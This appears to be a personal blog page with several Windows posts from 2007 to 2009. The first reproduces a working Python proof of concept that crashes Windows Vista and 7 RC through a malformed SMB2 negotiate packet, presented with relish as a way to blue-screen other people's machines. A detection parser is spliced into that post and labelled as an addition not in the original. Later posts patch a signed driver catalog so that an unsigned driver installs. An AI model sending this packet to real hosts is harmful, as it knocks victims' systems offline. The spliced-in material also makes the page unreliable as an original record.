Sep 09 2009

Remember the good old days when you were able to teardrop someone who was on Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for a limited time only, we are able to relive this experience once again until Microsoft releases a security patch. This affects all Windows Vista, Windows 7, and possibly Windows Server 2008 and Windows Server 2008 R2. Let’s hope they do release a security patch before Windows 7 officially launches.

Here’s the proof of concept. I’m going to keep a copy here just in case.

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()

s.connect(host)
s.send(buff)
s.close()

To stop your computer from BSOD for now, try disabling SMB 2.0. We might even see some script kiddie come up with a simple teardrop application to BSOD your computer.
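
For detection, the one abnormal field in the request can be checked on captured traffic. The following is an added example, not part of the original post or the original proof of concept: it parses an SMB1 Negotiate Protocol request and flags one that offers the SMB 2.002 dialect with a non-zero Process ID High. The function names, the in-memory sample builder and the choice to flag only when SMB 2.002 is offered are assumptions of this example.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
SMB2_DIALECT = b"SMB 2.002"   # dialect string offered in the PoC's request


def check_negotiate(payload):
    """Return a finding for a suspicious SMB1 Negotiate request, else None."""
    smb = payload[4:]                      # skip the 4-byte NetBIOS session header
    if len(smb) < 35 or smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        return None
    # Process ID High: 16-bit little-endian field at offset 12 of the SMB header.
    (pid_high,) = struct.unpack_from("<H", smb, 12)
    bc_off = 33 + 2 * smb[32]              # ByteCount follows WordCount + its words
    if len(smb) < bc_off + 2:
        return None
    (byte_count,) = struct.unpack_from("<H", smb, bc_off)
    data = smb[bc_off + 2:bc_off + 2 + byte_count]
    # Each dialect is encoded as 0x02 followed by a NUL-terminated ASCII name.
    dialects = [d[1:] for d in data.split(b"\x00") if d[:1] == b"\x02"]
    if SMB2_DIALECT in dialects and pid_high != 0:
        return "SMB2 negotiate with non-zero Process ID High 0x%04x" % pid_high
    return None


def build_sample(pid_high, dialects):
    """Constructed test input: a minimal Negotiate request, kept in memory only."""
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    header = (SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00" * 4  # status
              + b"\x18" + struct.pack("<H", 0xC853)                  # flags, flags2
              + struct.pack("<H", pid_high)                          # Process ID High
              + b"\x00" * 10                                         # signature + reserved
              + struct.pack("<HHHH", 0xFFFF, 0xFEFF, 0, 0))          # TID, PID, UID, MID
    body = header + b"\x00" + struct.pack("<H", len(data)) + data    # WordCount = 0
    return struct.pack(">I", len(body)) + body                       # session header


if __name__ == "__main__":
    offered = [b"NT LM 0.12", b"SMB 2.002"]
    for pid_high in (0x0000, 0x2600):
        print(hex(pid_high), check_negotiate(build_sample(pid_high, offered)))
```

The same condition can be expressed as an IDS rule on TCP port 445 traffic; the parser above is the logic such a rule would encode.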

Ah! The good old days again.

== Update ==

Windows 7 RTM and Windows Server 2008 R2 are already patched and fixed. This exploit only works on Windows Vista, Windows Server 2008, and Windows 7 RC.

Original Post: Microsoft Security Advisory 975497 Released

== End Update ==

Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

May 09 2008

If your Bluetooth adapter is a Broadcom Bluetooth 2.0 EDR, like the “ThinkPad Bluetooth with Enhanced Data Rate” or any Broadcom Bluetooth 2.0 EDR type adapter, you can follow the steps below to get Bluetooth working on Windows Server 2008.

Required for install:

Vista or WS2008 x86: http://www.toshiba-tro.de/tools/bluetooth/BT-stack.zip
Vista or WS2008 x64: http://www.toshiba-tro.de/tools/bluetooth/BT-stack-64bit.zip

Hex Editor, e.g. WinHex or CodePad

1. Download the package and install the software. When Toshiba Setup says to plug in your BT device, click Cancel. The install will complete successfully.

2. Open Device Manager (Start | Control Panel | Device Manager) or Start | Run… | devmgmt.msc

Under Other devices, find the Bluetooth dongle and open its Properties. On the Details tab, scroll the Property list to Hardware Ids. The Value box shows two lines, e.g.:

USB\VID_0A5C&PID_2101&REV_0100

USB\VID_0A5C&PID_2101

Copy the second line, the one with the short ID (‘USB\VID_0A5C&PID_2101’).

3. Now go to the folder:
Vista or WS2008 x86: %PROGRAMFILES%\Toshiba\Bluetooth Toshiba Stack\Drivers\tosrfusb

Vista or WS2008 x64: %PROGRAMFILES(x86)%\Toshiba\Bluetooth Toshiba Stack\Drivers\tosrfusb

It contains these files: tosrfusb.cat, tosrfusb.inf, tosrfusb.sys
You need to edit the *.cat and *.inf files.

4. Open tosrfusb.inf in Notepad.exe (e.g. Start | Run… | Notepad.exe)

Here you must edit line 161:

%TosrfUsb.DeviceDesc97%=TosrfUsb_Device,  USB\VID_0C24&PID_000F

and line 288:

%TosrfUsb.DeviceDesc97%=TosrfUsb_Device,  USB\VID_0C24&PID_000F

Edit these lines to:

%TosrfUsb.DeviceDesc97%=TosrfUsb_Device,  USB\VID_0A5C&PID_2101

And save as tosrfusb.inf (replace original file).

5. Open tosrfusb.cat in Hex Editor (e.g. WinHex, CodePad).

Press Ctrl+F and search for this sequence of hex values (do not search for it as a text value!):

4800570049004400390037020410010001042C7500730062005C007600690064005F00300063003200340026007000690064005F0030003000300035

or

H.W.I.D.9.7…….,u.s.b.\.v.i.d._.0.c.2.4.&.p.i.d._.0.0.0.5

or

HWID97   ,usb\vid_0c24&pid_0005

Change the value there with the help of an ASCII table, e.g.:

4800570049004400390037020410010001042C7500730062005C007600690064005F00300041003500430026007000690064005F0032003100300031

or

H.W.I.D.9.7…….,u.s.b.\.v.i.d._.0.A.5.C.&.p.i.d._.2.1.0.1

or

HWID97   ,usb\vid_0A5C&pid_2101

And save as tosrfusb.cat (replace original file).

6. Now you can install your BT.

Vista or WS2008 x86: %PROGRAMFILES%\Toshiba\Bluetooth Toshiba Stack\ECCenter.exe

Vista or WS2008 x64: %PROGRAMFILES(x86)%\Toshiba\Bluetooth Toshiba Stack\ECCenter.exe

Choose to ignore the warning about installing unsigned drivers, and everything should work.

[Source: MSDN Forums]

May 03 2008

If you try to install the WMP plugin for Firefox on Windows Server 2008 (or any server OS), you will get an error stating that server operating systems are not supported. To get it working, follow these steps.

  1. Rename wmpfirefoxplugin.exe to wmpfirefoxplugin.zip.
  2. Extract it into a directory.
  3. Type the following command in a console:
    msiexec /a ffplugin.msi
  4. It will probably install it in C:\
  5. Copy the file np-mswmp.dll into the plugins directory of Firefox (usually C:\Program Files\Mozilla Firefox\plugins)

Restart Firefox and it should work.

Jun 29 2007

The Windows Server 2008 Launch Team would like to invite you to register
and to share information about upcoming events in July. July’s focus will
cover Network Access Protection in Windows Server 2008. See details below
for our chat with Microsoft experts as well as our webcast.

Understanding Windows Server 2008 Networking and Network Access Protection Chat:

Join our experts and ask your
pressing questions about key networking features and roles, like Network Access
Protection, in Windows Server 2008. Take this opportunity to learn more about
how you can implement new network features like auto-tuning and the support for
the latest in network acceleration and hardware offload technologies, as well
as how to centrally manage network utilization with the new Quality of Service
(QoS) Group Policies. This chat also covers the concept of policy-driven
network access and illustrates how you can use the solutions Microsoft provides
in Windows Server 2008 (like Network Access Protection), and share your ideas
and provide feedback.


Monday, July 16, 2007 10:00 - 11:00 A.M. Pacific Time (SEA Time is Tuesday, July 17, 2007 | 01:00AM – 02:00AM)

To check out this chat and learn about other upcoming chats, visit the TechNet Chat Calendar or the Communities Chat Calendar.

TechNet Webcast: Windows Server 2008: Lessons Learned in a Real-World Network Access Protection Deployment (Level 300):

In this session on
Windows Server 2008, we discuss the drivers, challenges, and lessons learned
during the Louisiana State University (LSU) Network Access Protection (NAP)
deployment. We cover topics including 802.1x and DHCP enforcement methods and
integration with the existing physical network and the Active Directory
directory service. We also discuss challenges encountered during the
deployment, such as integration in a heterogeneous environment and managing
policy exceptions. This webcast can help prepare IT professionals who are
considering deploying NAP in large, complex enterprise environments.

Friday July 20, 2007 8:00 am Pacific Time (SEA Time is Friday July 20, 2007 | 11:00PM – 12:00AM)

To register, please visit:  http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032344626&Culture=en-US